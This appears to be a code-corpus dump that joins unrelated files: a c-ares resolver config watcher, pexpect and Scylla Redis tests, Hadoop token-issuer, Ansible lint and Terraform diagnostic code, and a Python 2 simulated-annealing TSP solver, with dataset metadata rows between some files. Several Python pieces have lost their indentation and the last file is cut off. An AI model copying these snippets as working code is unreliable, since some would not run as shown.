static ares_status_t config_change_check(ares_htable_strvp_t *filestat,
                                         const char *resolvconf_path)
{
  size_t i;
  const char *configfiles[16];
  ares_bool_t changed = ARES_FALSE;
  size_t cnt = 0;
  memset(configfiles, 0, sizeof(configfiles));
  configfiles[cnt++] = resolvconf_path;
  configfiles[cnt++] = "/etc/nsswitch.conf";
#ifdef _AIX
  configfiles[cnt++] = "/etc/netsvc.conf";
#endif
#ifdef __osf /* Tru64 */
  configfiles[cnt++] = "/etc/svc.conf";
#endif
#ifdef __QNX__
  configfiles[cnt++] = "/etc/net.cfg";
#endif
  configfiles[cnt++] = NULL;
  for (i = 0; configfiles[i] != NULL; i++) {
    fileinfo_t *fi = ares_htable_strvp_get_direct(filestat, configfiles[i]);
    struct stat st;
    if (stat(configfiles[i], &st) == 0) {
      /* First sighting of this file: cache a zeroed entry so the comparison
       * below reports it as changed. */
      if (fi == NULL) {
        fi = ares_malloc_zero(sizeof(*fi));
        if (fi == NULL) {
          return ARES_ENOMEM;
        }
        if (!ares_htable_strvp_insert(filestat, configfiles[i], fi)) {
          ares_free(fi);
          return ARES_ENOMEM;
        }
      }
      if (fi->size != (size_t)st.st_size || fi->mtime != (time_t)st.st_mtime) {
        changed = ARES_TRUE;
      }
      fi->size = (size_t)st.st_size;
      fi->mtime = (time_t)st.st_mtime;
    } else if (fi != NULL) {
      /* File no longer exists, remove */
      ares_htable_strvp_remove(filestat, configfiles[i]);
      changed = ARES_TRUE;
    }
  }
  if (changed) {
    return ARES_SUCCESS;
  }
  return ARES_ENOTFOUND;
}
/* Polling thread body: wakes every 30s (or immediately when signaled for
 * shutdown), re-checks the config files, and reinitializes the channel when
 * something changed.  Holds the lock for the whole loop; the condition wait
 * releases it while sleeping. */
static void *ares_event_configchg_thread(void *arg)
{
  ares_event_configchg_t *c = arg;
  ares_thread_mutex_lock(c->lock);
  while (c->isup) {
    ares_status_t status;
    /* Anything other than a timeout means we were woken explicitly (likely
     * shutdown) -- loop back and re-test isup instead of scanning. */
    if (ares_thread_cond_timedwait(c->wake, c->lock, 30000) != ARES_ETIMEOUT) {
      continue;
    }
    /* make sure status didn't change even though we got a timeout */
    if (!c->isup) {
      break;
    }
    status = config_change_check(c->filestat, c->resolvconf_path);
    if (status == ARES_SUCCESS) {
      ares_reinit(c->e->channel);
    }
  }
  ares_thread_mutex_unlock(c->lock);
  return NULL;
}
/* Initialize the stat()-polling configuration watcher: allocate state,
 * prime the file snapshot cache, and start the background poll thread.
 *
 * \param[out] configchg  allocated watcher on success, untouched on failure
 * \param[in]  e          owning event thread
 * \return ARES_SUCCESS or ARES_ENOMEM / thread-creation status. */
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
                                        ares_event_thread_t *e)
{
  ares_status_t status = ARES_SUCCESS;
  ares_event_configchg_t *c = NULL;
  *configchg = NULL;
  c = ares_malloc_zero(sizeof(*c));
  if (c == NULL) {
    status = ARES_ENOMEM;
    goto done;
  }
  c->e = e;
  c->filestat = ares_htable_strvp_create(ares_free);
  if (c->filestat == NULL) {
    status = ARES_ENOMEM;
    goto done;
  }
  c->wake = ares_thread_cond_create();
  if (c->wake == NULL) {
    status = ARES_ENOMEM;
    goto done;
  }
  c->lock = ares_thread_mutex_create();
  if (c->lock == NULL) {
    status = ARES_ENOMEM;
    goto done;
  }
  /* Fall back to the compiled-in default path when the channel has none. */
  c->resolvconf_path = c->e->channel->resolvconf_path;
  if (c->resolvconf_path == NULL) {
    c->resolvconf_path = PATH_RESOLV_CONF;
  }
  /* Prime the snapshot cache; a "changed" result here is expected and
   * ignored -- only allocation failure is fatal. */
  status = config_change_check(c->filestat, c->resolvconf_path);
  if (status == ARES_ENOMEM) {
    goto done;
  }
  c->isup = ARES_TRUE;
  status = ares_thread_create(&c->thread, ares_event_configchg_thread, c);
done:
  if (status != ARES_SUCCESS) {
    ares_event_configchg_destroy(c);
  } else {
    *configchg = c;
  }
  return status;
}
/* Tear down the stat()-polling watcher: flag the thread to stop, wake it,
 * join it, then release all resources.  NULL-safe, and tolerant of a
 * partially-constructed object from a failed init. */
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
  if (configchg == NULL) {
    return;
  }
  if (configchg->lock) {
    ares_thread_mutex_lock(configchg->lock);
  }
  /* Request shutdown under the lock so the poll thread can't miss it. */
  configchg->isup = ARES_FALSE;
  if (configchg->wake) {
    ares_thread_cond_signal(configchg->wake);
  }
  if (configchg->lock) {
    ares_thread_mutex_unlock(configchg->lock);
  }
  if (configchg->thread) {
    void *rv = NULL;
    ares_thread_join(configchg->thread, &rv);
  }
  ares_thread_mutex_destroy(configchg->lock);
  ares_thread_cond_destroy(configchg->wake);
  ares_htable_strvp_destroy(configchg->filestat);
  ares_free(configchg);
}
#else
/* Fallback stubs for platforms with no change-detection support: init
 * reports the feature as unimplemented, destroy is a no-op. */
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
                                        ares_event_thread_t *e)
{
  (void)configchg;
  (void)e;
  /* No ability */
  return ARES_ENOTIMP;
}
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
  /* No-op */
  (void)configchg;
}
#endif | c | github | https://github.com/nodejs/node | deps/cares/src/lib/event/ares_event_configchg.c |
#!/usr/bin/env python
'''
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2016, Martin Packman <martin.packman@canonical.com>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
import contextlib
import os
import tempfile
import unittest
import pexpect
from . import PexpectTestCase
@contextlib.contextmanager
def example_script(name, output='success'):
    """Yield a temporary directory holding an executable shell script.

    The script is named *name* and echoes *output* when run; both the
    script and its directory are removed on exit from the context.
    """
    script_dir = tempfile.mkdtemp(prefix='tmp-pexpect-test')
    try:
        path = os.path.join(script_dir, name)
        with open(path, 'w') as stream:
            stream.write('#!/bin/sh\necho "%s"' % (output,))
        try:
            os.chmod(path, 0o755)
            yield script_dir
        finally:
            os.remove(path)
    finally:
        os.rmdir(script_dir)
class TestCaseEnv(PexpectTestCase.PexpectTestCase):
    " tests for the env argument to pexpect.spawn and pexpect.run "
    def test_run_uses_env(self):
        " pexpect.run uses env argument when running child process "
        script_name = 'run_uses_env.sh'
        environ = {'PEXPECT_TEST_KEY': 'pexpect test value'}
        # The script echoes $PEXPECT_TEST_KEY, so the output proves the
        # child saw the supplied environment rather than os.environ.
        with example_script(script_name, '$PEXPECT_TEST_KEY') as script_dir:
            script = os.path.join(script_dir, script_name)
            out = pexpect.run(script, env=environ)
        self.assertEqual(out.rstrip(), b'pexpect test value')
    def test_spawn_uses_env(self):
        " pexpect.spawn uses env argument when running child process "
        script_name = 'spawn_uses_env.sh'
        environ = {'PEXPECT_TEST_KEY': 'pexpect test value'}
        with example_script(script_name, '$PEXPECT_TEST_KEY') as script_dir:
            script = os.path.join(script_dir, script_name)
            child = pexpect.spawn(script, env=environ)
            out = child.readline()
            # Drain to EOF so exitstatus is populated before asserting.
            child.expect(pexpect.EOF)
        self.assertEqual(child.exitstatus, 0)
        self.assertEqual(out.rstrip(), b'pexpect test value')
    def test_run_uses_env_path(self):
        " pexpect.run uses binary from PATH when given in env argument "
        script_name = 'run_uses_env_path.sh'
        # Only the script's basename is passed; resolution must go through
        # the PATH provided via env.
        with example_script(script_name) as script_dir:
            out = pexpect.run(script_name, env={'PATH': script_dir})
        self.assertEqual(out.rstrip(), b'success')
    def test_run_uses_env_path_over_path(self):
        " pexpect.run uses PATH from env over os.environ "
        script_name = 'run_uses_env_path_over_path.sh'
        # Two same-named scripts: the one on os.environ's PATH prints
        # 'failure', the one on env's PATH prints 'success'.
        with example_script(script_name, output='failure') as wrong_dir:
            with example_script(script_name) as right_dir:
                orig_path = os.environ['PATH']
                os.environ['PATH'] = wrong_dir
                try:
                    out = pexpect.run(script_name, env={'PATH': right_dir})
                finally:
                    # Always restore the process PATH, even on failure.
                    os.environ['PATH'] = orig_path
        self.assertEqual(out.rstrip(), b'success')
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
#
# This file is part of Scylla.
#
# Scylla is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Scylla is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Scylla. If not, see <http://www.gnu.org/licenses/>.
#
import pytest
import redis
import logging
from util import random_string, connect
logger = logging.getLogger('redis-test')
def test_hset_hget_delete(redis_host, redis_port):
    """Exercise basic HSET/HGET/DEL behavior, including arity errors.

    Checks that HSET with too few arguments is rejected, that a field can
    be set, read back, overwritten, and that deleting the key removes it.
    """
    r = connect(redis_host, redis_port)
    key = random_string(10)
    field = random_string(10)
    val = random_string(10)
    other_val = random_string(10)
    # HSET with no field/value must be rejected as an arity error.
    try:
        r.execute_command("HSET testkey")
        raise Exception('Expect that `HSET testkey` does not work')
    except redis.exceptions.ResponseError as ex:
        assert str(ex) == "wrong number of arguments for 'hset' command"
    # HSET with a field but no value must likewise be rejected.
    try:
        r.execute_command("HSET testkey testfield")
        raise Exception('Expect that `HSET testkey testfield` does not work')
    except redis.exceptions.ResponseError as ex:
        assert str(ex) == "wrong number of arguments for 'hset' command"
    # New field: HSET reports 1 (one field added).
    assert r.hset(key, field, val) == 1
    assert r.hget(key, field) == val
    # Check overwrite
    r.hset(key, field, other_val)
    assert r.hget(key, field) == other_val
    # Check delete
    assert r.delete(key) == 1
    # Identity comparison is the idiomatic None check (was `== None`).
    assert r.hget(key, field) is None
@pytest.mark.xfail(reason="HSET command does not support multiple key/field")
def test_hset_multiple_key_field(redis_host, redis_port):
    # This test requires the library to support multiple mappings in one
    # command, or we cannot test this feature. This was added to redis-py
    # in version 3.5.0, in April 29, 2020.
    # NOTE(review): distutils is deprecated (removed in Python 3.12);
    # consider a tuple-based version compare instead -- TODO confirm.
    from distutils.version import LooseVersion
    if LooseVersion(redis.__version__) < LooseVersion('3.5.0'):
        pytest.skip('redis-py library too old to run this test')
    r = connect(redis_host, redis_port)
    key = random_string(10)
    field = random_string(10)
    val = random_string(10)
    field2 = random_string(10)
    val2 = random_string(10)
    # Two new fields in one HSET call should report 2 fields added.
    assert r.hset(key, None, None, {field: val, field2: val2}) == 2
@pytest.mark.xfail(reason="HSET command does not support return of changes, it always return 1")
def test_hset_return_changes(redis_host, redis_port):
    # HSET should return 1 when a field is created and 0 when an existing
    # field is merely updated; marked xfail because the server under test
    # always returns 1.
    r = connect(redis_host, redis_port)
    key = random_string(10)
    field = random_string(10)
    val = random_string(10)
    assert r.hset(key, field, val) == 1
    assert r.hset(key, field, val) == 0
def test_hget_nonexistent_key(redis_host, redis_port):
    """HGET on a key that was never created must return None."""
    r = connect(redis_host, redis_port)
    key = random_string(10)
    field = random_string(10)
    # Identity comparison is the idiomatic None check (was `== None`).
    assert r.hget(key, field) is None
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.security.token;
import org.apache.hadoop.classification.InterfaceAudience;
import org.apache.hadoop.classification.InterfaceStability;
import org.apache.hadoop.io.Text;
import org.apache.hadoop.security.Credentials;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
/**
* Class for issuing delegation tokens.
*/
@InterfaceAudience.LimitedPrivate({"HDFS", "MapReduce", "Yarn"})
@InterfaceStability.Unstable
public interface DelegationTokenIssuer {
  Logger TOKEN_LOG = LoggerFactory.getLogger(DelegationTokenIssuer.class);
  /**
   * The service name used as the alias for the token in the credential
   * token map. addDelegationTokens will use this to determine if
   * a token exists, and if not, add a new token with this alias.
   * A null return means the issuer itself has no token alias (children may
   * still be consulted).
   * @return the token.
   */
  String getCanonicalServiceName();
  /**
   * Unconditionally get a new token with the optional renewer. Returning
   * null indicates the service does not issue tokens.
   * @param renewer renewer.
   * @return the token.
   * @throws IOException raised on errors performing I/O.
   */
  Token<?> getDelegationToken(String renewer) throws IOException;
  /**
   * Issuers may need tokens from additional services.
   *
   * @return delegation token issuer.
   * @throws IOException raised on errors performing I/O.
   */
  default DelegationTokenIssuer[] getAdditionalTokenIssuers()
      throws IOException {
    return null;
  }
  /**
   * Given a renewer, add delegation tokens for issuer and it's child issuers
   * to the <code>Credentials</code> object if it is not already present.
   *<p>
   * Note: This method is not intended to be overridden. Issuers should
   * implement getCanonicalService and getDelegationToken to ensure
   * consistent token acquisition behavior.
   *
   * @param renewer the user allowed to renew the delegation tokens
   * @param credentials cache in which to add new delegation tokens
   * @return list of new delegation tokens
   * @throws IOException thrown if IOException if an IO error occurs.
   */
  default Token<?>[] addDelegationTokens(
      final String renewer, Credentials credentials) throws IOException {
    // Tolerate a null cache by working against a throwaway one.
    if (credentials == null) {
      credentials = new Credentials();
    }
    final List<Token<?>> tokens = new ArrayList<>();
    collectDelegationTokens(this, renewer, credentials, tokens);
    return tokens.toArray(new Token<?>[tokens.size()]);
  }
  /**
   * NEVER call this method directly.
   *
   * Recursively collects tokens for the issuer and its additional issuers,
   * skipping any service for which the credentials cache already holds one.
   *
   * @param issuer issuer.
   * @param renewer renewer.
   * @param credentials cache in which to add new delegation tokens.
   * @param tokens list of new delegation tokens.
   * @throws IOException raised on errors performing I/O.
   */
  @InterfaceAudience.Private
  static void collectDelegationTokens(
      final DelegationTokenIssuer issuer,
      final String renewer,
      final Credentials credentials,
      final List<Token<?>> tokens) throws IOException {
    final String serviceName = issuer.getCanonicalServiceName();
    // Collect token of the this issuer and then of its embedded children
    if (TOKEN_LOG.isDebugEnabled()) {
      TOKEN_LOG.debug("Search token for service {} in credentials",
          serviceName);
    }
    if (serviceName != null) {
      final Text service = new Text(serviceName);
      Token<?> token = credentials.getToken(service);
      if (token == null) {
        if (TOKEN_LOG.isDebugEnabled()) {
          TOKEN_LOG.debug("Token for service {} not found in credentials," +
              " try getDelegationToken.", serviceName);
        }
        token = issuer.getDelegationToken(renewer);
        // A null token means the issuer declined to issue one; only real
        // tokens are recorded and cached.
        if (token != null) {
          tokens.add(token);
          credentials.addToken(service, token);
        }
      } else {
        if (TOKEN_LOG.isDebugEnabled()) {
          TOKEN_LOG.debug("Token for service {} found in credentials," +
              "skip getDelegationToken.", serviceName);
        }
      }
    }
    // Now collect the tokens from the children.
    final DelegationTokenIssuer[] ancillary =
        issuer.getAdditionalTokenIssuers();
    if (ancillary != null) {
      for (DelegationTokenIssuer subIssuer : ancillary) {
        collectDelegationTokens(subIssuer, renewer, credentials, tokens);
      }
    }
  }
}
# -*- coding: utf-8 -*-
"""
requests.defaults
~~~~~~~~~~~~~~~~~
This module provides the Requests configuration defaults.
Configurations:
:base_headers: Default HTTP headers.
:verbose: Stream to write request logging to.
:max_redirects: Maximum number of redirects allowed within a request.s
:keep_alive: Reuse HTTP Connections?
:max_retries: The number of times a request should be retried in the event of a connection failure.
:danger_mode: If true, Requests will raise errors immediately.
:safe_mode: If true, Requests will catch all errors.
:strict_mode: If true, Requests will do its best to follow RFCs (e.g. POST redirects).
:pool_maxsize: The maximium size of an HTTP connection pool.
:pool_connections: The number of active HTTP connection pools to use.
:encode_uri: If true, URIs will automatically be percent-encoded.
:trust_env: If true, the surrouding environment will be trusted (environ, netrc).
"""
SCHEMAS = ['http', 'https']
from . import __version__

# Default configuration values consulted by every Requests session.
# Keys are documented in the module docstring above.
defaults = {
    'base_headers': {
        'User-Agent': 'python-requests/%s' % __version__,
        'Accept-Encoding': ', '.join(('identity', 'deflate', 'compress', 'gzip')),
        'Accept': '*/*',
    },
    'verbose': None,
    'max_redirects': 30,
    'pool_connections': 10,
    'pool_maxsize': 10,
    'max_retries': 0,
    'danger_mode': False,
    'safe_mode': False,
    'strict_mode': False,
    'keep_alive': True,
    'encode_uri': True,
    'trust_env': True,
}
"""Sanity test using PSScriptAnalyzer."""
from __future__ import absolute_import, print_function
import collections
import json
import os
import re
from lib.sanity import (
SanitySingleVersion,
SanityMessage,
SanityFailure,
SanitySuccess,
SanitySkipped,
)
from lib.util import (
SubprocessError,
run_command,
find_executable,
)
from lib.config import (
SanityConfig,
)
from lib.test import (
calculate_confidence,
calculate_best_confidence,
)
PSLINT_SKIP_PATH = 'test/sanity/pslint/skip.txt'
PSLINT_IGNORE_PATH = 'test/sanity/pslint/ignore.txt'
class PslintTest(SanitySingleVersion):
    """Sanity test using PSScriptAnalyzer."""
    def test(self, args, targets):
        """Run PSScriptAnalyzer over PowerShell targets and report findings.

        Applies the skip/ignore lists, flags stale entries in both, and
        converts the analyzer's JSON output into sanity messages.

        :type args: SanityConfig
        :type targets: SanityTargets
        :rtype: TestResult
        """
        with open(PSLINT_SKIP_PATH, 'r') as skip_fd:
            skip_paths = skip_fd.read().splitlines()
        invalid_ignores = []
        with open(PSLINT_IGNORE_PATH, 'r') as ignore_fd:
            ignore_entries = ignore_fd.read().splitlines()
            # path -> {rule code -> ignore-file line number}
            ignore = collections.defaultdict(dict)
            line = 0
            for ignore_entry in ignore_entries:
                line += 1
                if ' ' not in ignore_entry:
                    invalid_ignores.append((line, 'Invalid syntax'))
                    continue
                path, code = ignore_entry.split(' ', 1)
                if not os.path.exists(path):
                    invalid_ignores.append((line, 'Remove "%s" since it does not exist' % path))
                    continue
                ignore[path][code] = line
        # Only PowerShell files that are not explicitly skipped.
        paths = sorted(i.path for i in targets.include if os.path.splitext(i.path)[1] in ('.ps1', '.psm1', '.psd1') and i.path not in skip_paths)
        if not paths:
            return SanitySkipped(self.name)
        if not find_executable('pwsh', required='warning'):
            return SanitySkipped(self.name)
        cmd = ['test/sanity/pslint/pslint.ps1'] + paths
        try:
            stdout, stderr = run_command(args, cmd, capture=True)
            status = 0
        except SubprocessError as ex:
            # A non-zero exit simply means findings exist; capture output.
            stdout = ex.stdout
            stderr = ex.stderr
            status = ex.status
        if stderr:
            raise SubprocessError(cmd=cmd, status=status, stderr=stderr, stdout=stdout)
        if args.explain:
            return SanitySuccess(self.name)
        # Index maps PSScriptAnalyzer's numeric Severity to a level name.
        severity = [
            'Information',
            'Warning',
            'Error',
        ]
        cwd = os.getcwd() + '/'
        # replace unicode smart quotes with ascii versions
        stdout = re.sub(u'[\u2018\u2019]', "'", stdout)
        stdout = re.sub(u'[\u201c\u201d]', '"', stdout)
        messages = json.loads(stdout)
        errors = [SanityMessage(
            code=m['RuleName'],
            message=m['Message'],
            path=m['ScriptPath'].replace(cwd, ''),
            line=m['Line'] or 0,
            column=m['Column'] or 0,
            level=severity[m['Severity']],
        ) for m in messages]
        line = 0
        filtered = []
        for error in errors:
            if error.code in ignore[error.path]:
                ignore[error.path][error.code] = None  # error ignored, clear line number of ignore entry to track usage
            else:
                filtered.append(error)  # error not ignored
        errors = filtered
        for invalid_ignore in invalid_ignores:
            errors.append(SanityMessage(
                code='A201',
                message=invalid_ignore[1],
                path=PSLINT_IGNORE_PATH,
                line=invalid_ignore[0],
                column=1,
                # NOTE(review): 'line' is 0 here (reset above for the
                # skip-path loop); invalid_ignore[0] looks intended -- verify.
                confidence=calculate_confidence(PSLINT_IGNORE_PATH, line, args.metadata) if args.metadata.changes else None,
            ))
        for path in skip_paths:
            line += 1
            if not os.path.exists(path):
                # Keep files out of the list which no longer exist in the repo.
                errors.append(SanityMessage(
                    code='A101',
                    message='Remove "%s" since it does not exist' % path,
                    path=PSLINT_SKIP_PATH,
                    line=line,
                    column=1,
                    confidence=calculate_best_confidence(((PSLINT_SKIP_PATH, line), (path, 0)), args.metadata) if args.metadata.changes else None,
                ))
        # Any ignore entry whose line number survived was never matched by a
        # reported error, so it is stale and should be removed.
        for path in paths:
            if path not in ignore:
                continue
            for code in ignore[path]:
                line = ignore[path][code]
                if not line:
                    continue
                errors.append(SanityMessage(
                    code='A102',
                    message='Remove since "%s" passes "%s" test' % (path, code),
                    path=PSLINT_IGNORE_PATH,
                    line=line,
                    column=1,
                    confidence=calculate_best_confidence(((PSLINT_IGNORE_PATH, line), (path, 0)), args.metadata) if args.metadata.changes else None,
                ))
        if errors:
            return SanityFailure(self.name, messages=errors)
        return SanitySuccess(self.name)
// Copyright (c) HashiCorp, Inc.
// SPDX-License-Identifier: BUSL-1.1
package graph
import "github.com/hashicorp/terraform/internal/tfdiags"
// DiagnosticCausedByTestFailure implements multiple interfaces that enables it to
// be used in the "Extra" field of a diagnostic. This type should only be used as
// the Extra for diagnostics reporting assertions that fail in a run block during
// `terraform test`.
//
// DiagnosticCausedByTestFailure implements the [DiagnosticExtraCausedByTestFailure]
// interface. This allows downstream logic to identify diagnostics that are specifically
// due to assertion failures.
//
// DiagnosticCausedByTestFailure also implements the [DiagnosticExtraBecauseEphemeral],
// [DiagnosticExtraBecauseSensitive], and [DiagnosticExtraBecauseUnknown] interfaces.
// These interfaces allow the diagnostic renderer to include ephemeral, sensitive or
// unknown data if it's present. This is enabled because if a test fails then the user
// will want to know what values contributed to the failing assertion.
//
// When using this, set the Extra to DiagnosticCausedByTestFailure(true) and also
// populate the EvalContext and Expression fields of the diagnostic.
type DiagnosticCausedByTestFailure struct {
	// Verbose records whether `terraform test` ran in verbose mode,
	// which is surfaced through IsTestVerboseMode below.
	Verbose bool
}

// Compile-time assertions that DiagnosticCausedByTestFailure satisfies the
// diagnostic "extra" interfaces it claims to implement.
var _ tfdiags.DiagnosticExtraCausedByTestFailure = DiagnosticCausedByTestFailure{false}
var _ tfdiags.DiagnosticExtraBecauseEphemeral = DiagnosticCausedByTestFailure{false}
var _ tfdiags.DiagnosticExtraBecauseSensitive = DiagnosticCausedByTestFailure{false}
var _ tfdiags.DiagnosticExtraBecauseUnknown = DiagnosticCausedByTestFailure{false}

// DiagnosticCausedByTestFailure reports that this diagnostic stems from a
// failed test assertion. Always true for this type.
func (e DiagnosticCausedByTestFailure) DiagnosticCausedByTestFailure() bool {
	return true
}

// IsTestVerboseMode reports whether the test run requested verbose output.
func (e DiagnosticCausedByTestFailure) IsTestVerboseMode() bool {
	return e.Verbose
}

// DiagnosticCausedByEphemeral permits the renderer to show ephemeral values
// involved in the failing assertion.
func (e DiagnosticCausedByTestFailure) DiagnosticCausedByEphemeral() bool {
	return true
}

// DiagnosticCausedBySensitive permits the renderer to show sensitive values
// involved in the failing assertion.
func (e DiagnosticCausedByTestFailure) DiagnosticCausedBySensitive() bool {
	return true
}

// DiagnosticCausedByUnknown permits the renderer to show unknown values
// involved in the failing assertion.
func (e DiagnosticCausedByTestFailure) DiagnosticCausedByUnknown() bool {
	return true
}
area: ES|QL
issues: []
pr: 142160
summary: Add `appliesTo` to the TRange and TBucket functions
type: enhancement | unknown | github | https://github.com/elastic/elasticsearch | docs/changelog/142160.yaml |
"""
Implementacion del algoritmo de recocido simulado
para la materia electiva Computacion Emergente
@author Yohan Graterol <yograterol@fedoraproject.org> 2013
"""
from collections import deque
from math import exp
try:
from numpy.random import (permutation, random_sample)
from numpy import (log, matrix, array, add)
except ImportError:
from numpypy.random import (permutation, random_sample)
from numpypy import (log, matrix, array, add)
from copy import deepcopy
from random import randint
from time import time
class LoadData(object):
    """Load a TSP distance file and build a symmetric distance matrix.

    The input file holds the strict lower triangle of the distance matrix,
    one row per line; ``create_matrix`` left-pads each row with zeros and
    adds the transpose to produce the full symmetric matrix.

    Bug fixed: the original kept ``file_name`` as a class attribute while
    also declaring ``__slots__``, so ``LoadData('other.txt')`` raised
    AttributeError on ``self.file_name = file_name``.  The attribute now
    lives in ``__slots__`` with the default applied in ``__init__``.
    """
    __slots__ = ['data', 'matrix', 'file_name']

    def __init__(self, file_name=None):
        # Preserve the old default path when no name is supplied.
        self.file_name = file_name if file_name else 'tsp29.txt'
        self.load_data()

    def load_data(self):
        """Read all lines of the input file into self.data.

        A trailing '0 0' row is appended so the padded matrix is square.
        The file is closed deterministically via a context manager.
        """
        with open(self.file_name) as tmp_file:
            self.data = tmp_file.readlines()
        self.data.append('0 0')

    def create_matrix(self):
        """Build the symmetric distance matrix from the loaded rows."""
        self.matrix = list()
        total_line = len(self.data)
        for line in self.data:
            line = deque(map(lambda x: int(x), line.split()))
            # Left-pad with zeros so every row has total_line entries.
            for i in range(total_line - len(line)):
                line.appendleft(0)
            self.matrix.append(list(line))
        self.matrix = array(self.matrix)
        # Mirror the lower triangle into the upper one.
        self.matrix = add(self.matrix, self.matrix.transpose())
class SimulatedAnnealing(object):
    # Simulated-annealing TSP solver (note: print_result uses Python 2
    # print-statement syntax, so this class requires Python 2).
    __slots__ = ['matrix', 'T', 't', 't_final', 'step', 'cities', 'firts_vc',
                 'Vc', 'Vn', 'Vc_eval', 'Vn_eval', 'alpha']
    def __init__(self, T=1000, alpha=0.9899, t_final=0.001, t=1, cities=29, step=200):
        # T: initial temperature; alpha: geometric cooling factor;
        # t_final: stop temperature; step: iterations per temperature level.
        data = LoadData()
        data.create_matrix()
        self.matrix = data.matrix
        self.T = T
        #self.t = t
        self.t_final = t_final
        self.alpha = alpha
        self.cities = cities
        self.Vc = None
        self.firts_vc = range(self.cities)
        self.step = step
        #import pandas
        #print pandas.DataFrame(self.matrix, range(self.cities), range(self.cities))
    def tsp(self):
        # Main annealing loop: accept better tours always, worse tours with
        # probability exp(-delta/T); cool geometrically until t_final.
        self.Vc = self.generate_solution()
        self.Vc_eval = self.eval_solution(self.Vc)
        while(self.T > self.t_final):
            for i in range(self.step):
                self.Vn = self.generate_solution(self.Vc)
                self.Vn_eval = self.eval_solution(self.Vn)
                delta = self.Vn_eval - self.Vc_eval
                if delta < 0:
                    self.Vc = self.Vn
                    self.Vc_eval = self.Vn_eval
                elif random_sample() < exp(-delta/self.T):
                    self.Vc = self.Vn
                    self.Vc_eval = self.Vn_eval
            self.T *= self.alpha
            #self.T *= self.reduce_temp(self.t)
            #self.t += 1
    def reduce_temp(self, t):
        # Alternative logarithmic cooling schedule (currently unused).
        return self.alpha / log(1 + t)
    def generate_solution(self, Vc=None):
        # With no current tour: random permutation of all cities.
        # Otherwise: neighbor tour obtained by swapping two distinct cities.
        if Vc is None:
            Vn = list(permutation(self.firts_vc))
            return Vn
        Vn = deepcopy(Vc)
        i1 = randint(0, self.cities - 1)
        i2 = randint(0, self.cities - 1)
        while(i1 == i2):
            i2 = randint(0, self.cities - 1)
        Vn[i1], Vn[i2] = Vn[i2], Vn[i1]
        return Vn
    def eval_solution(self, Vn):
        # Total tour length, including the closing edge back to the start.
        km = 0
        for c in range(len(Vn) - 1):
            i = Vn[c]
            j = Vn[c + 1]
            km += self.matrix[i][j]
        km += self.matrix[Vn[0]][Vn[self.cities - 1]]
        return km
    def print_result(self):
        # Python 2 print statements: best tour and its length.
        print self.Vc
        print self.eval_solution(self.Vc)
if __name__ == '__main__':
    # Command-line entry point: run a full annealing pass and report the
    # best tour plus wall-clock time (Python 2 print syntax).
    start = time()
    tsp = SimulatedAnnealing()
    tsp.tsp()
    print "Resultado optimo"
    tsp.print_result()
    print "Tiempo: ", time() - start
# Copyright 2014 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
# standard library modules, , ,
import os
import subprocess
import tempfile
import logging
import hgapi
import errno
# fsutils, , misc filesystem utils, internal
import fsutils
git_logger = logging.getLogger('git')
hg_logger = logging.getLogger('hg')
class VCSError(Exception):
    """Raised when a version-control operation fails.

    :param message: human-readable description of the failure
    :param returncode: exit status of the failed VCS command, or None when
        the failure was not a command exit (e.g. a missing executable)
    """

    def __init__(self, message, returncode=None):
        super(VCSError, self).__init__(message)
        self.returncode = returncode
class VCS(object):
    """Abstract interface over a version-control working copy.

    Concrete backends (Git, HG) override the abstract methods below.
    Fix: the original defined ``isClean`` twice with identical bodies;
    the duplicate has been removed (behavior unchanged -- the second
    definition simply shadowed the first).
    """
    @classmethod
    def cloneToTemporaryDir(cls, remote):
        """Clone *remote* into a fresh temporary directory."""
        raise NotImplementedError()
    @classmethod
    def cloneToDirectory(cls, remote, directory, tag=None):
        """Clone *remote* into *directory*, optionally checking out *tag*."""
        raise NotImplementedError()
    def isClean(self):
        """Return True when the working tree has no uncommitted changes."""
        raise NotImplementedError()
    def commit(self, message, tag=None):
        """Commit staged changes, optionally applying *tag*."""
        raise NotImplementedError()
    def tags(self):
        """Return the list of tag names in the repository."""
